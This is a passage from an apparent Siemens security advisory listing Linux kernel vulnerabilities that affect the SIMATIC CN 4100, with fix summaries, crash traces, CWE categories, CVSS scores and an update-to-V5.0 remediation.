invalid struct references in fbcon_putcs(). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38687 In the Linux kernel, the following vulnerability has been resolved: comedi: fix race between polling and detaching syzbot reports a use-after-free in comedi in the below link, which is due to comedi gladly removing the allocated async area even though poll requests are still active on the wait_queue_head inside of it. This can cause a use-after-free when the poll entries are later triggered or removed, as the memory for the wait_queue_head has been freed. We need to check there are no tasks queued on any of the subdevices' wait queues before allowing the device to be detached by the `COMEDI_DEVCONFIG` ioctl. Tasks will read-lock `dev->attach_lock` before adding themselves to the subdevice wait queue, so fix the problem in the `COMEDI_DEVCONFIG` ioctl handler by write-locking `dev->attach_lock` before checking that all of the subdevices are safe to be deleted. This includes testing for any sleepers on the subdevices' wait queues. It remains locked until the device has been detached. This requires the `comedi_device_detach()` function to be refactored slightly, moving the bulk of it into new function `comedi_device_detach_locked()`. Note that the refactor of `comedi_device_detach()` results in `comedi_device_cancel_all()` now being called while `dev->attach_lock` is write-locked, which wasn't the case previously, but that does not matter. Thanks to Jens Axboe for diagnosing the problem and co-developing this patch. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38691 In the Linux kernel, the following vulnerability has been resolved: pNFS: Fix uninited ptr deref in block/scsi layout The error occurs on the third attempt to encode extents. When function ext_tree_prepare_commit() reallocates a larger buffer to retry encoding extents, the "layoutupdate_pages" page array is initialized only after the retry loop. But ext_tree_free_commitdata() is called on every iteration and tries to put pages in the array, thus dereferencing uninitialized pointers. An additional problem is that there is no limit on the maximum possible buffer_size. When there are too many extents, the client may create a layoutcommit that is larger than the maximum possible RPC size accepted by the server. During testing, we observed two typical scenarios. First, one memory page for extents is enough when we work with small files, append data to the end of the file, or preallocate extents before writing. But when we fill a new large file without preallocating, the number of extents can be huge, and counting the number of written extents in ext_tree_encode_commit() does not help much. Since this number increases even more between unlocking and locking of ext_tree, the reallocated buffer may not be large enough again and again. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-908 Use of Uninitialized Resource Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38693 In the Linux kernel, the following vulnerability has been resolved: media: dvb-frontends: w7090p: fix null-ptr-deref in w7090p_tuner_write_serpar and w7090p_tuner_read_serpar In w7090p_tuner_write_serpar, msg is controlled by user. When msg[0].buf is null and msg[0].len is zero, former checks on msg[0].buf would be passed. If accessing msg[0].buf[2] without sanity check, null pointer deref would happen. We add check on msg[0].len to prevent crash. Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()") View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38694 In the Linux kernel, the following vulnerability has been resolved: media: dvb-frontends: dib7090p: fix null-ptr-deref in dib7090p_rw_on_apb() In dib7090p_rw_on_apb, msg is controlled by user. When msg[0].buf is null and msg[0].len is zero, former checks on msg[0].buf would be passed. If accessing msg[0].buf[2] without sanity check, null pointer deref would happen. We add check on msg[0].len to prevent crash. Similar issue occurs when access msg[1].buf[0] and msg[1].buf[1]. Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()") View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38695 In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Check for hdwq null ptr when cleaning up lpfc_vport structure If a call to lpfc_sli4_read_rev() from lpfc_sli4_hba_setup() fails, the resultant cleanup routine lpfc_sli4_vport_delete_fcp_xri_aborted() may occur before sli4_hba.hdwqs are allocated. This may result in a null pointer dereference when attempting to take the abts_io_buf_list_lock for the first hardware queue. Fix by adding a null ptr check on phba->sli4_hba.hdwq and early return because this situation means there must have been an error during port initialization. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38696 In the Linux kernel, the following vulnerability has been resolved: MIPS: Don't crash in stack_top() for tasks without ABI or vDSO Not all tasks have an ABI associated or vDSO mapped, for example kthreads never do. If such a task ever ends up calling stack_top(), it will derefence the NULL ABI pointer and crash. This can for example happen when using kunit: mips_stack_top+0x28/0xc0 arch_pick_mmap_layout+0x190/0x220 kunit_vm_mmap_init+0xf8/0x138 __kunit_add_resource+0x40/0xa8 kunit_vm_mmap+0x88/0xd8 usercopy_test_init+0xb8/0x240 kunit_try_run_case+0x5c/0x1a8 kunit_generic_run_threadfn_adapter+0x28/0x50 kthread+0x118/0x240 ret_from_kernel_thread+0x14/0x1c Only dereference the ABI point if it is set. The GIC page is also included as it is specific to the vDSO. Also move the randomization adjustment into the same conditional. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38697 In the Linux kernel, the following vulnerability has been resolved: jfs: upper bound check of tree index in dbAllocAG When computing the tree index in dbAllocAG, we never check if we are out of bounds realative to the size of the stree. This could happen in a scenario where the filesystem metadata are corrupted. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38698 In the Linux kernel, the following vulnerability has been resolved: jfs: Regular file corruption check The reproducer builds a corrupted file on disk with a negative i_size value. Add a check when opening this file to avoid subsequent operation failures. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38699 In the Linux kernel, the following vulnerability has been resolved: scsi: bfa: Double-free fix When the bfad_im_probe() function fails during initialization, the memory pointed to by bfad->im is freed without setting bfad->im to NULL. Subsequently, during driver uninstallation, when the state machine enters the bfad_sm_stopping state and calls the bfad_im_probe_undo() function, it attempts to free the memory pointed to by bfad->im again, thereby triggering a double-free vulnerability. Set bfad->im to NULL if probing fails. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-415 Double Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.4 MEDIUM CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H CVE-2025-38700 In the Linux kernel, the following vulnerability has been resolved: scsi: libiscsi: Initialize iscsi_conn->dd_data only if memory is allocated In case of an ib_fast_reg_mr allocation failure during iSER setup, the machine hits a panic because iscsi_conn->dd_data is initialized unconditionally, even when no memory is allocated (dd_size == 0). This leads invalid pointer dereference during connection teardown. Fix by setting iscsi_conn->dd_data only if memory is actually allocated. Panic trace: ------------ iser: iser_create_fastreg_desc: Failed to allocate ib_fast_reg_mr err=-12 iser: iser_alloc_rx_descriptors: failed allocating rx descriptors / data buffers BUG: unable to handle page fault for address: fffffffffffffff8 RIP: 0010:swake_up_locked.part.5+0xa/0x40 Call Trace: complete+0x31/0x40 iscsi_iser_conn_stop+0x88/0xb0 [ib_iser] iscsi_stop_conn+0x66/0xc0 [scsi_transport_iscsi] iscsi_if_stop_conn+0x14a/0x150 [scsi_transport_iscsi] iscsi_if_rx+0x1135/0x1834 [scsi_transport_iscsi] ? netlink_lookup+0x12f/0x1b0 ? netlink_deliver_tap+0x2c/0x200 netlink_unicast+0x1ab/0x280 netlink_sendmsg+0x257/0x4f0 ? _copy_from_user+0x29/0x60 sock_sendmsg+0x5f/0x70 View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38701 In the Linux kernel, the following vulnerability has been resolved: ext4: do not BUG when INLINE_DATA_FL lacks system.data xattr A syzbot fuzzed image triggered a BUG_ON in ext4_update_inline_data() when an inode had the INLINE_DATA_FL flag set but was missing the system.data extended attribute. Since this can happen due to a maiciouly fuzzed file system, we shouldn't BUG, but rather, report it as a corrupted file system. Add similar replacements of BUG_ON with EXT4_ERROR_INODE() ii ext4_create_inline_data() and ext4_inline_data_truncate(). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-617 Reachable Assertion Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38702 In the Linux kernel, the following vulnerability has been resolved: fbdev: fix potential buffer overflow in do_register_framebuffer() The current implementation may lead to buffer overflow when: 1. Unregistration creates NULL gaps in registered_fb[] 2. All array slots become occupied despite num_registered_fb < FB_MAX 3. The registration loop exceeds array bounds Add boundary check to prevent registered_fb[FB_MAX] access. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38706 In the Linux kernel, the following vulnerability has been resolved: ASoC: core: Check for rtd == NULL in snd_soc_remove_pcm_runtime() snd_soc_remove_pcm_runtime() might be called with rtd == NULL which will leads to null pointer dereference. This was reproduced with topology loading and marking a link as ignore due to missing hardware component on the system. On module removal the soc_tplg_remove_link() would call snd_soc_remove_pcm_runtime() with rtd == NULL since the link was ignored, no runtime was created. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38707 In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Add sanity check for file name The length of the file name should be smaller than the directory entry size. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38708 In the Linux kernel, the following vulnerability has been resolved: drbd: add missing kref_get in handle_write_conflicts With `two-primaries` enabled, DRBD tries to detect "concurrent" writes and handle write conflicts, so that even if you write to the same sector simultaneously on both nodes, they end up with the identical data once the writes are completed. In handling "superseeded" writes, we forgot a kref_get, resulting in a premature drbd_destroy_device and use after free, and further to kernel crashes with symptoms. Relevance: No one should use DRBD as a random data generator, and apparently all users of "two-primaries" handle concurrent writes correctly on layer up. That is cluster file systems use some distributed lock manager, and live migration in virtualization environments stops writes on one node before starting writes on the other node. Which means that other than for "test cases", this code path is never taken in real life. FYI, in DRBD 9, things are handled differently nowadays. We still detect "write conflicts", but no longer try to be smart about them. We decided to disconnect hard instead: upper layers must not submit concurrent writes. If they do, that's their fault. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38711 In the Linux kernel, the following vulnerability has been resolved: smb/server: avoid deadlock when linking with ReplaceIfExists If smb2_create_link() is called with ReplaceIfExists set and the name does exist then a deadlock will happen. ksmbd_vfs_kern_path_locked() will return with success and the parent directory will be locked. ksmbd_vfs_remove_file() will then remove the file. ksmbd_vfs_link() will then be called while the parent is still locked. It will try to lock the same parent and will deadlock. This patch moves the ksmbd_vfs_kern_path_unlock() call to *before* ksmbd_vfs_link() and then simplifies the code, removing the file_present flag variable. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38712 In the Linux kernel, the following vulnerability has been resolved: hfsplus: don't use BUG_ON() in hfsplus_create_attributes_file() When the volume header contains erroneous values that do not reflect the actual state of the filesystem, hfsplus_fill_super() assumes that the attributes file is not yet created, which later results in hitting BUG_ON() when hfsplus_create_attributes_file() is called. Replace this BUG_ON() with -EIO error with a message to suggest running fsck tool. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38713 In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix slab-out-of-bounds read in hfsplus_uni2asc() The hfsplus_readdir() method is capable to crash by calling hfsplus_uni2asc(): [ 667.121659][ T9805] ================================================================== [ 667.122651][ T9805] BUG: KASAN: slab-out-of-bounds in hfsplus_uni2asc+0x902/0xa10 [ 667.123627][ T9805] Read of size 2 at addr ffff88802592f40c by task repro/9805 [ 667.124578][ T9805] [ 667.124876][ T9805] CPU: 3 UID: 0 PID: 9805 Comm: repro Not tainted 6.16.0-rc3 #1 PREEMPT(full) [ 667.124886][ T9805] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 667.124890][ T9805] Call Trace: [ 667.124893][ T9805] [ 667.124896][ T9805] dump_stack_lvl+0x10e/0x1f0 [ 667.124911][ T9805] print_report+0xd0/0x660 [ 667.124920][ T9805] ? __virt_addr_valid+0x81/0x610 [ 667.124928][ T9805] ? __phys_addr+0xe8/0x180 [ 667.124934][ T9805] ? hfsplus_uni2asc+0x902/0xa10 [ 667.124942][ T9805] kasan_report+0xc6/0x100 [ 667.124950][ T9805] ? hfsplus_uni2asc+0x902/0xa10 [ 667.124959][ T9805] hfsplus_uni2asc+0x902/0xa10 [ 667.124966][ T9805] ? hfsplus_bnode_read+0x14b/0x360 [ 667.124974][ T9805] hfsplus_readdir+0x845/0xfc0 [ 667.124984][ T9805] ? __pfx_hfsplus_readdir+0x10/0x10 [ 667.124994][ T9805] ? stack_trace_save+0x8e/0xc0 [ 667.125008][ T9805] ? iterate_dir+0x18b/0xb20 [ 667.125015][ T9805] ? trace_lock_acquire+0x85/0xd0 [ 667.125022][ T9805] ? lock_acquire+0x30/0x80 [ 667.125029][ T9805] ? iterate_dir+0x18b/0xb20 [ 667.125037][ T9805] ? down_read_killable+0x1ed/0x4c0 [ 667.125044][ T9805] ? putname+0x154/0x1a0 [ 667.125051][ T9805] ? __pfx_down_read_killable+0x10/0x10 [ 667.125058][ T9805] ? apparmor_file_permission+0x239/0x3e0 [ 667.125069][ T9805] iterate_dir+0x296/0xb20 [ 667.125076][ T9805] __x64_sys_getdents64+0x13c/0x2c0 [ 667.125084][ T9805] ? __pfx___x64_sys_getdents64+0x10/0x10 [ 667.125091][ T9805] ? __x64_sys_openat+0x141/0x200 [ 667.125126][ T9805] ? __pfx_filldir64+0x10/0x10 [ 667.125134][ T9805] ? do_user_addr_fault+0x7fe/0x12f0 [ 667.125143][ T9805] do_syscall_64+0xc9/0x480 [ 667.125151][ T9805] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 667.125158][ T9805] RIP: 0033:0x7fa8753b2fc9 [ 667.125164][ T9805] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 48 [ 667.125172][ T9805] RSP: 002b:00007ffe96f8e0f8 EFLAGS: 00000217 ORIG_RAX: 00000000000000d9 [ 667.125181][ T9805] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fa8753b2fc9 [ 667.125185][ T9805] RDX: 0000000000000400 RSI: 00002000000063c0 RDI: 0000000000000004 [ 667.125190][ T9805] RBP: 00007ffe96f8e110 R08: 00007ffe96f8e110 R09: 00007ffe96f8e110 [ 667.125195][ T9805] R10: 0000000000000000 R11: 0000000000000217 R12: 0000556b1e3b4260 [ 667.125199][ T9805] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 [ 667.125207][ T9805] [ 667.125210][ T9805] [ 667.145632][ T9805] Allocated by task 9805: [ 667.145991][ T9805] kasan_save_stack+0x20/0x40 [ 667.146352][ T9805] kasan_save_track+0x14/0x30 [ 667.146717][ T9805] __kasan_kmalloc+0xaa/0xb0 [ 667.147065][ T9805] __kmalloc_noprof+0x205/0x550 [ 667.147448][ T9805] hfsplus_find_init+0x95/0x1f0 [ 667.147813][ T9805] hfsplus_readdir+0x220/0xfc0 [ 667.148174][ T9805] iterate_dir+0x296/0xb20 [ 667.148549][ T9805] __x64_sys_getdents64+0x13c/0x2c0 [ 667.148937][ T9805] do_syscall_64+0xc9/0x480 [ 667.149291][ T9805] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 667.149809][ T9805] [ 667.150030][ T9805] The buggy address belongs to the object at ffff88802592f000 [ 667.150030][ T9805] which belongs to the cache kmalloc-2k of size 2048 [ 667.151282][ T9805] The buggy address is located 0 bytes to the right of [ 667.151282][ T9805] allocated 1036-byte region [ffff88802592f000, ffff88802592f40c) [ 667.1 ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38714 In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix slab-out-of-bounds in hfsplus_bnode_read() The hfsplus_bnode_read() method can trigger the issue: [ 174.852007][ T9784] ================================================================== [ 174.852709][ T9784] BUG: KASAN: slab-out-of-bounds in hfsplus_bnode_read+0x2f4/0x360 [ 174.853412][ T9784] Read of size 8 at addr ffff88810b5fc6c0 by task repro/9784 [ 174.854059][ T9784] [ 174.854272][ T9784] CPU: 1 UID: 0 PID: 9784 Comm: repro Not tainted 6.16.0-rc3 #7 PREEMPT(full) [ 174.854281][ T9784] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 174.854286][ T9784] Call Trace: [ 174.854289][ T9784] [ 174.854292][ T9784] dump_stack_lvl+0x10e/0x1f0 [ 174.854305][ T9784] print_report+0xd0/0x660 [ 174.854315][ T9784] ? __virt_addr_valid+0x81/0x610 [ 174.854323][ T9784] ? __phys_addr+0xe8/0x180 [ 174.854330][ T9784] ? hfsplus_bnode_read+0x2f4/0x360 [ 174.854337][ T9784] kasan_report+0xc6/0x100 [ 174.854346][ T9784] ? hfsplus_bnode_read+0x2f4/0x360 [ 174.854354][ T9784] hfsplus_bnode_read+0x2f4/0x360 [ 174.854362][ T9784] hfsplus_bnode_dump+0x2ec/0x380 [ 174.854370][ T9784] ? __pfx_hfsplus_bnode_dump+0x10/0x10 [ 174.854377][ T9784] ? hfsplus_bnode_write_u16+0x83/0xb0 [ 174.854385][ T9784] ? srcu_gp_start+0xd0/0x310 [ 174.854393][ T9784] ? __mark_inode_dirty+0x29e/0xe40 [ 174.854402][ T9784] hfsplus_brec_remove+0x3d2/0x4e0 [ 174.854411][ T9784] __hfsplus_delete_attr+0x290/0x3a0 [ 174.854419][ T9784] ? __pfx_hfs_find_1st_rec_by_cnid+0x10/0x10 [ 174.854427][ T9784] ? __pfx___hfsplus_delete_attr+0x10/0x10 [ 174.854436][ T9784] ? __asan_memset+0x23/0x50 [ 174.854450][ T9784] hfsplus_delete_all_attrs+0x262/0x320 [ 174.854459][ T9784] ? __pfx_hfsplus_delete_all_attrs+0x10/0x10 [ 174.854469][ T9784] ? rcu_is_watching+0x12/0xc0 [ 174.854476][ T9784] ? __mark_inode_dirty+0x29e/0xe40 [ 174.854483][ T9784] hfsplus_delete_cat+0x845/0xde0 [ 174.854493][ T9784] ? __pfx_hfsplus_delete_cat+0x10/0x10 [ 174.854507][ T9784] hfsplus_unlink+0x1ca/0x7c0 [ 174.854516][ T9784] ? __pfx_hfsplus_unlink+0x10/0x10 [ 174.854525][ T9784] ? down_write+0x148/0x200 [ 174.854532][ T9784] ? __pfx_down_write+0x10/0x10 [ 174.854540][ T9784] vfs_unlink+0x2fe/0x9b0 [ 174.854549][ T9784] do_unlinkat+0x490/0x670 [ 174.854557][ T9784] ? __pfx_do_unlinkat+0x10/0x10 [ 174.854565][ T9784] ? __might_fault+0xbc/0x130 [ 174.854576][ T9784] ? getname_flags.part.0+0x1c5/0x550 [ 174.854584][ T9784] __x64_sys_unlink+0xc5/0x110 [ 174.854592][ T9784] do_syscall_64+0xc9/0x480 [ 174.854600][ T9784] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 174.854608][ T9784] RIP: 0033:0x7f6fdf4c3167 [ 174.854614][ T9784] Code: f0 ff ff 73 01 c3 48 8b 0d 26 0d 0e 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 08 [ 174.854622][ T9784] RSP: 002b:00007ffcb948bca8 EFLAGS: 00000206 ORIG_RAX: 0000000000000057 [ 174.854630][ T9784] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f6fdf4c3167 [ 174.854636][ T9784] RDX: 00007ffcb948bcc0 RSI: 00007ffcb948bcc0 RDI: 00007ffcb948bd50 [ 174.854641][ T9784] RBP: 00007ffcb948cd90 R08: 0000000000000001 R09: 00007ffcb948bb40 [ 174.854645][ T9784] R10: 00007f6fdf564fc0 R11: 0000000000000206 R12: 0000561e1bc9c2d0 [ 174.854650][ T9784] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 [ 174.854658][ T9784] [ 174.854661][ T9784] [ 174.879281][ T9784] Allocated by task 9784: [ 174.879664][ T9784] kasan_save_stack+0x20/0x40 [ 174.880082][ T9784] kasan_save_track+0x14/0x30 [ 174.880500][ T9784] __kasan_kmalloc+0xaa/0xb0 [ 174.880908][ T9784] __kmalloc_noprof+0x205/0x550 [ 174.881337][ T9784] __hfs_bnode_create+0x107/0x890 [ 174.881779][ T9784] hfsplus_bnode_find+0x2d0/0xd10 [ 174.882222][ T9784] hfsplus_brec_find+0x2b0/0x520 [ 174.882659][ T9784] hfsplus_delete_all_attrs+0x23b/0x3 ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38715 In the Linux kernel, the following vulnerability has been resolved: hfs: fix slab-out-of-bounds in hfs_bnode_read() This patch introduces is_bnode_offset_valid() method that checks the requested offset value. Also, it introduces check_and_correct_requested_length() method that checks and correct the requested length (if it is necessary). These methods are used in hfs_bnode_read(), hfs_bnode_write(), hfs_bnode_clear(), hfs_bnode_copy(), and hfs_bnode_move() with the goal to prevent the access out of allocated memory and triggering the crash. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38721 In the Linux kernel, the following vulnerability has been resolved: netfilter: ctnetlink: fix refcount leak on table dump There is a reference count leak in ctnetlink_dump_table(): if (res < 0) { nf_conntrack_get(&ct->ct_general); // HERE cb->args[1] = (unsigned long)ct; ... While its very unlikely, its possible that ct == last. If this happens, then the refcount of ct was already incremented. This 2nd increment is never undone. This prevents the conntrack object from being released, which in turn keeps prevents cnet->count from dropping back to 0. This will then block the netns dismantle (or conntrack rmmod) as nf_conntrack_cleanup_net_list() will wait forever. This can be reproduced by running conntrack_resize.sh selftest in a loop. It takes ~20 minutes for me on a preemptible kernel on average before I see a runaway kworker spinning in nf_conntrack_cleanup_net_list. One fix would to change this to: if (res < 0) { if (ct != last) nf_conntrack_get(&ct->ct_general); But this reference counting isn't needed in the first place. We can just store a cookie value instead. A followup patch will do the same for ctnetlink_exp_dump_table, it looks to me as if this has the same problem and like ctnetlink_dump_table, we only need a 'skip hint', not the actual object so we can apply the same cookie strategy there as well. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-772 Missing Release of Resource after Effective Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38723 In the Linux kernel, the following vulnerability has been resolved: LoongArch: BPF: Fix jump offset calculation in tailcall The extra pass of bpf_int_jit_compile() skips JIT context initialization which essentially skips offset calculation leaving out_offset = -1, so the jmp_offset in emit_bpf_tail_call is calculated by "#define jmp_offset (out_offset - (cur_offset))" is a negative number, which is wrong. The final generated assembly are as follow. 54: bgeu $a2, $t1, -8 # 0x0000004c 58: addi.d $a6, $s5, -1 5c: bltz $a6, -16 # 0x0000004c 60: alsl.d $t2, $a2, $a1, 